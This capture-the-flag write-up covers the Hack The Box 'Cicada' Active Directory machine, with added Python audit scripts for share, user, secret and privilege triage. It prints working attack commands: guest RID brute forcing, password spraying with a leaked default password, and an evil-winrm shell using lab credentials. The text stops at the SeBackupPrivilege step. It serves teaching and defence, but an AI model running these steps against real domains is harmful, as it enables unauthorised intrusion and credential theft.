HTB:Cicada
Intro
Cicada is a great example of an introductory Windows Active Directory box that shows how simple enumeration can lead to major wins.
The TL;DR:
- We enumerate an open SMB share and find a “new hire” welcome message that contains a default password.
- We brute force RIDs to obtain a list of domain users. A password spray with the default password reveals a user who never changed it.
- With valid credentials we enumerate further and discover another password stored in Active Directory metadata.
- That user has access to a different SMB share which contains a backup script with plaintext credentials.
- Testing those credentials against WinRM provides us with an interactive shell.
- Checking privileges shows the account has SeBackupPrivilege enabled.
- We use this to export the registry hives, dump the local SAM hashes, and pass the hash to authenticate as Administrator.
Recon
Nmap first look
Start with a service-detection scan:
sudo nmap -sVC 10.129.231.149
..snip..
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-01 09:00:22Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: 2025-10-01T09:01:50+00:00; +7h01m30s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-01T09:01:52+00:00; +7h01m30s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-01T09:01:50+00:00; +7h01m30s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: 2025-10-01T09:01:52+00:00; +7h01m30s from scanner time.
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-10-01T09:01:10
|_  start_date: N/A
|_clock-skew: mean: 7h01m29s, deviation: 0s, median: 7h01m29s
Key findings:
- The domain cicada.htb shows up on many ports, as does the hostname CICADA-DC. I’ll add these to my /etc/hosts file:
10.129.231.149 CICADA-DC cicada.htb CICADA-DC.cicada.htb
- Presence of AD-specific services (Kerberos on 88, LDAP/GC on 389/3268/636/3269, SMB, DNS, RPC) plus the hostname all point to a DC.
- The scan shows a significant clock skew (~+7h), which can break Kerberos operations if not accounted for.
SMB - TCP 445: the low-hanging fruit
Given a DC with SMB open, I tried anonymous/guest access.
Anonymous attempt:
nxc smb 10.129.231.149 -u '' -p '' --shares
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\: 
SMB         10.129.231.149  445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED
Guest attempt succeeded:
nxc smb 10.129.231.149 -u 'Guest' -p '' --shares
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\Guest: 
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV                             
SMB         10.129.231.149  445    CICADA-DC        HR              READ            
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.231.149  445    CICADA-DC        SYSVOL                          Logon server share 
ADMIN$, C$ and IPC$ are standard on any Windows host; NETLOGON and SYSVOL are standard on a DC. HR and DEV are non-standard, and HR is the only one Guest can read.
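The triage in the previous sentence is easy to automate. The following Python script is an added example (not part of the original writeup or of nxc itself): it parses the share table in the format `nxc smb ... --shares` prints, separates the default shares from the custom ones, and reports what access the tested account has on each. The sample listing is constructed to mirror the Guest enumeration above; the parser assumes nxc's permission vocabulary (READ, WRITE, READ,WRITE) and share names without spaces.

```python
import re

# Shares every Windows host (or DC) exposes by default; anything else is
# worth a second look, especially when an unauthenticated account can read it.
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "PRINT$", "NETLOGON", "SYSVOL"}

# Every nxc line starts with "SMB  <ip>  <port>  <hostname>"; keep what follows.
NXC_PREFIX = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<payload>.*)$")
# One share row: name, optional permission word, optional remark. Assumes the
# permission vocabulary nxc prints (READ, WRITE, READ,WRITE) and share names
# without spaces.
SHARE_ROW = re.compile(
    r"^(?P<name>\S+)\s*(?P<perms>READ,WRITE|READ|WRITE)?(?=\s|$)\s*(?P<remark>.*)$"
)

# Constructed sample (not a capture from the box): the Guest share listing in
# the layout `nxc smb ... --shares` uses.
SAMPLE_SHARES = """\
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\\Guest:
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV
SMB         10.129.231.149  445    CICADA-DC        HR              READ
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.129.231.149  445    CICADA-DC        SYSVOL                          Logon server share
"""


def parse_shares(nxc_output):
    """Return a list of {name, perms, remark} dicts from `nxc smb --shares` output."""
    shares, in_table = [], False
    for line in nxc_output.splitlines():
        m = NXC_PREFIX.match(line)
        if not m:
            continue
        payload = m.group("payload").rstrip()
        if not in_table:
            # Skip banner/auth lines until the column header appears.
            in_table = payload.startswith("Share") and "Permissions" in payload
            continue
        if not payload or payload.startswith("-----"):
            continue
        row = SHARE_ROW.match(payload)
        shares.append({
            "name": row.group("name"),
            "perms": row.group("perms") or "",
            "remark": row.group("remark").strip(),
        })
    return shares


def nondefault_shares(nxc_output):
    """Custom shares and the access the tested account has on them ('none' if no permission column)."""
    return [
        (s["name"], s["perms"] or "none")
        for s in parse_shares(nxc_output)
        if s["name"].upper() not in DEFAULT_SHARES
    ]


if __name__ == "__main__":
    for name, perms in nondefault_shares(SAMPLE_SHARES):
        print(f"non-default share {name}: access={perms}")
```

Run against a real capture by piping the nxc output into `parse_shares`; a non-default share that a Guest or null session can read is exactly the kind of finding that should be fixed by removing Guest/Everyone read rights on the share and its NTFS ACL, and is cheap to audit across a whole estate this way.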
As we only have access to HR, I pulled the share with smbclient -N //10.129.231.149/HR and found Notice from HR.txt. The file reads:
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
I’ll note the password:
Cicada$M6Corpb*@Lp#nZp!8
Now we just need to pair this up with a username.
Finding usernames via RID brute force
Using an RID-brute, I extracted domain accounts:
nxc smb 10.129.231.149 -u 'Guest' -p '' --rid-brute
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\Guest: 
SMB         10.129.231.149  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
I cleaned the output to get a usable list of usernames for testing.
Administrator 
Guest 
krbtgt 
CICADA-DC$ 
john.smoulder 
sarah.dantelia 
michael.wrightson 
david.orelious 
emily.oscars
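Cleaning the RID-brute output by hand works for nine accounts; on a real domain there are hundreds. As an added example (not from the original writeup and not part of nxc), the following Python script parses the `--rid-brute` lines, keeps only user objects, and optionally drops machine accounts (names ending in `$`) and built-in RIDs below 1000. It also pulls out the custom groups and aliases, since names like "Dev Support" usually encode who has access to what. The sample input is constructed from a subset of the entries shown above.

```python
import re

# Every nxc line starts with "SMB  <ip>  <port>  <hostname>"; keep what follows.
NXC_PREFIX = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<payload>.*)$")
# One RID row, e.g. "1104: CICADA\john.smoulder (SidTypeUser)"
RID_ROW = re.compile(
    r"^(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<kind>SidType\w+)\)$"
)

# Constructed sample (a subset of the real listing, in nxc's --rid-brute layout).
SAMPLE_RID_BRUTE = """\
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\\Guest:
SMB         10.129.231.149  445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        501: CICADA\\Guest (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        502: CICADA\\krbtgt (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        512: CICADA\\Domain Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1101: CICADA\\DnsAdmins (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\\john.smoulder (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\\Dev Support (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\\emily.oscars (SidTypeUser)
"""


def parse_rid_brute(output):
    """Return [{rid, domain, name, kind}] for every RID row in the nxc output."""
    entries = []
    for line in output.splitlines():
        m = NXC_PREFIX.match(line)
        if not m:
            continue
        row = RID_ROW.match(m.group("payload").strip())
        if row:
            entries.append({
                "rid": int(row.group("rid")),
                "domain": row.group("domain"),
                "name": row.group("name"),
                "kind": row.group("kind"),
            })
    return entries


def user_list(output, include_machine=False, include_builtin=True):
    """Usernames of SidTypeUser objects, in RID order.

    include_machine: keep computer accounts (names ending in '$').
    include_builtin: keep well-known RIDs below 1000 (Administrator, Guest, krbtgt).
    """
    names = []
    for e in parse_rid_brute(output):
        if e["kind"] != "SidTypeUser":
            continue
        if e["name"].endswith("$") and not include_machine:
            continue
        if e["rid"] < 1000 and not include_builtin:
            continue
        names.append(e["name"])
    return names


def custom_groups(output):
    """Groups and aliases created after domain setup (RID >= 1000)."""
    return [
        e["name"] for e in parse_rid_brute(output)
        if e["kind"] in ("SidTypeGroup", "SidTypeAlias") and e["rid"] >= 1000
    ]


if __name__ == "__main__":
    print("\n".join(user_list(SAMPLE_RID_BRUTE)))
    print("custom groups:", custom_groups(SAMPLE_RID_BRUTE))
```

From the defensive side the interesting part is that all of this came from a Guest session: RID cycling over SAMR works because Guest was enabled and allowed to bind to IPC$. Disabling the Guest account and restricting anonymous/guest SAM enumeration (the "Network access: Restrict clients allowed to make remote calls to SAM" policy) removes the starting point.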
Password spraying
I sprayed the discovered password against the user list:
nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
Credential found: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8.
Logging in as Michael didn’t immediately give anything interesting (shares same as Guest). So I continued enumerating users via SMB:
nxc smb 10.129.231.149 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.231.149  445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.129.231.149  445    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain 
SMB         10.129.231.149  445    CICADA-DC        Guest                         2024-08-28 17:26:56 1       Built-in account for guest access to the computer/domain 
SMB         10.129.231.149  445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 1       Key Distribution Center Service Account 
SMB         10.129.231.149  445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1        
SMB         10.129.231.149  445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1        
SMB         10.129.231.149  445    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0        
SMB         10.129.231.149  445    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3 
SMB         10.129.231.149  445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0
I discovered that david.orelious had a password written in his AD description field:
Just in case I forget my password is aRt$Lp#7t*VQ!3
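A password in a user's description attribute is a classic AD hygiene failure, and it is readable by every authenticated domain user by default, so it is worth checking for periodically rather than waiting for an enumeration like the one above. The Python script below is an added example (not part of the writeup or of nxc): it parses the `--users` table nxc prints and flags descriptions that either mention a password-like keyword or contain a token that looks like a credential (8+ characters, at least one digit, three or more character classes). The sample rows are constructed; the sarah.dantelia description is invented for the test, david.orelious's is the one from the box.

```python
import re
import string

# Every nxc line starts with "SMB  <ip>  <port>  <hostname>"; keep what follows.
NXC_PREFIX = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<payload>.*)$")
# Rows of `nxc smb --users`: username, last-password-set timestamp (or <never>),
# bad-password count, then the free-text description.
USER_ROW = re.compile(
    r"^(?P<user>\S+)\s+(?P<pwset>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d|<never>)\s+"
    r"(?P<badpw>\d+)\s*(?P<desc>.*)$"
)
KEYWORDS = re.compile(r"\b(pass(word|wd|phrase)?|pwd?|secret|credentials?)\b", re.I)

# Constructed sample in nxc's --users layout. The sarah.dantelia description is
# invented for this example; the others mirror the listing above.
SAMPLE_USERS = """\
SMB         10.129.231.149  445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.129.231.149  445    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain
SMB         10.129.231.149  445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 1       Key Distribution Center Service Account
SMB         10.129.231.149  445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1
SMB         10.129.231.149  445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1       Temp pw is Winter2024! until onboarding finishes
SMB         10.129.231.149  445    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB         10.129.231.149  445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0
"""


def looks_like_secret(token):
    """Heuristic: 8+ chars, contains a digit, and mixes at least three character classes."""
    if len(token) < 8 or not any(c.isdigit() for c in token):
        return False
    classes = (
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(c in string.punctuation for c in token),
    )
    return sum(classes) >= 3


def scan_descriptions(nxc_output):
    """Return [(username, [reasons])] for accounts whose description looks like it leaks a secret."""
    findings = []
    for line in nxc_output.splitlines():
        m = NXC_PREFIX.match(line)
        if not m:
            continue
        row = USER_ROW.match(m.group("payload").strip())
        if not row or not row.group("desc").strip():
            continue
        desc = row.group("desc").strip()
        reasons = []
        if KEYWORDS.search(desc):
            reasons.append("keyword")
        if any(looks_like_secret(tok) for tok in desc.split()):
            reasons.append("secret-like token")
        if reasons:
            findings.append((row.group("user"), reasons))
    return findings


if __name__ == "__main__":
    for user, reasons in scan_descriptions(SAMPLE_USERS):
        print(f"{user}: description flagged ({', '.join(reasons)})")
```

The heuristic deliberately requires a digit so that ordinary hyphenated words such as "Built-in" are not flagged; tune the thresholds to your naming conventions. The same check can be run directly against LDAP (the `description` attribute) on a schedule, which catches the problem before anyone else reads it.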
Using leaked password and escalating access to a higher-priv user
With david.orelious’s password I enumerated shares again:
nxc smb 10.129.231.149 -u david.orelious  -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.231.149  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.231.149  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.231.149  445    CICADA-DC        -----           -----------     ------
SMB         10.129.231.149  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.231.149  445    CICADA-DC        C$                              Default share
SMB         10.129.231.149  445    CICADA-DC        DEV             READ            
SMB         10.129.231.149  445    CICADA-DC        HR              READ            
SMB         10.129.231.149  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.231.149  445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.231.149  445    CICADA-DC        SYSVOL          READ            Logon server share 
I found the DEV share readable and discovered a PowerShell backup script, Backup_script.ps1, which reads:
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
We now have emily.oscars:Q!3@Lp#M6b*7t*Vt in plaintext.
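The `ConvertTo-SecureString "..." -AsPlainText -Force` idiom is the usual way a plaintext password ends up in a PowerShell script: it produces a SecureString, but the literal is still right there in the file. As an added example (not from the writeup, and not a tool the box uses), the following Python scanner looks for that idiom and, more generally, for quoted literals assigned to variables whose names suggest a secret, reporting line numbers with the value redacted. It goes a little beyond the page's single script by covering generic `password = "..."`/`api_key = "..."` assignments too; the sample script is constructed and the password in it is a placeholder.

```python
import re

# Patterns that indicate a secret embedded in a script (case-insensitive).
PATTERNS = {
    # PowerShell: ConvertTo-SecureString "<literal>" -AsPlainText
    "powershell-plaintext-securestring": re.compile(
        r"ConvertTo-SecureString\s+(?P<secret>[\"'][^\"']*[\"'])\s+-AsPlainText", re.I),
    # Generic: $dbPass = "...", secret = '...', api_key = "...", token = "..."
    "hardcoded-secret-assignment": re.compile(
        r"\$?\w*(?:pass(?:word|wd|phrase)?|pwd|secret|api[_-]?key|token)\w*\s*=\s*"
        r"(?P<secret>[\"'][^\"']*[\"'])", re.I),
}

# Constructed sample script; the values are placeholders, not real credentials.
SAMPLE_SCRIPT = """\
$sourceDirectory = "C:\\smb"
$username = "svc_backup"
$password = ConvertTo-SecureString "P@ssw0rd-example" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dbPass = 'Sup3rS3cret!'
# Safer: load a credential that Export-Clixml protected with DPAPI for this user
$credentials = Import-Clixml -Path "C:\\secure\\backup.cred"
"""


def redact(quoted_literal):
    """Keep the first two characters of the literal so a finding can be matched to the file."""
    inner = quoted_literal[1:-1]
    return inner[:2] + "*" * max(len(inner) - 2, 0)


def scan_script(text):
    """Return [{line, kind, secret}] for every hard-coded secret found in the script text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            m = pattern.search(line)
            if m:
                findings.append({"line": lineno, "kind": kind, "secret": redact(m.group("secret"))})
    return findings


if __name__ == "__main__":
    for f in scan_script(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['kind']} ({f['secret']})")
```

Note that line 7 of the sample is not flagged: `Export-Clixml` on a PSCredential stores the password DPAPI-encrypted for the user and machine that wrote it, and `Import-Clixml` reads it back, so the script carries no reusable secret. A scheduled scan of the scripts on file shares such as DEV, or a pre-commit hook in the repository they come from, is the practical way to keep this idiom out.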
What the shell?
Emily’s credentials stand out:
- The PowerShell backup script contains Emily’s username and password in plaintext.
- Credentials found in scripts are often used by services or accounts with broader privileges. That makes the account worth testing across services (SMB, WinRM, RDP, etc.) for possible interactive access, while remembering it may be a non-interactive/service account in some environments.
Interactive access: WinRM
Testing Emily’s credentials for interactive access:
nxc winrm 10.129.231.149 -u emily.oscars  -p 'Q!3@Lp#M6b*7t*Vt'
WINRM       10.129.231.149  5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.129.231.149  5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
I used evil-winrm to get an interactive shell:
evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
PS C:\Users\emily.oscars.CICADA\Documents>
Checking token privileges with whoami /priv revealed:
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeBackupPrivilege is the important one here. If we can enable and use it, we can save the registry hives and extract the local SAM hashes.
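Reading the `whoami /priv` table by eye is fine once, but the point generalises: a handful of privileges are equivalent to local administrator whether or not they show as Enabled, because the holder can switch a Disabled privilege on with a single AdjustTokenPrivileges call. The following Python script is an added example (not from the writeup) that parses the table and flags the privileges that matter; the sample is the table above.

```python
import re

# One row of `whoami /priv`: name, description, state.
PRIV_ROW = re.compile(
    r"^(?P<name>Se\w+Privilege)\s+(?P<desc>.+?)\s+(?P<state>Enabled|Disabled)\s*$"
)

# Privileges that let their holder bypass normal ACLs or take over other
# security contexts; presence in the token is the finding, not the state.
HIGH_RISK = {
    "SeBackupPrivilege": "read any file or registry hive regardless of ACL",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate client tokens",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
}

# Sample input: the whoami /priv output from the emily.oscars session above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""


def parse_privileges(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_ROW.match(line.strip())
        if m:
            privs[m.group("name")] = m.group("state")
    return privs


def risky_privileges(text):
    """Return [(name, state, why)] for high-risk privileges present in the token, in table order."""
    privs = parse_privileges(text)
    return [(name, state, HIGH_RISK[name]) for name, state in privs.items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in risky_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name} ({state}): {why}")
```

The remediation is at the source of the right, not in the token: take the account out of whichever group or policy grants SeBackupPrivilege on the DC (on a domain controller that right is effectively DC admin). For detection, logons that carry these privileges generate event 4672 ("Special privileges assigned to new logon"), and `reg save HKLM\SAM` from a non-admin user session is worth an alert on its own.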
From SeBackupPrivilege to SYSTEM
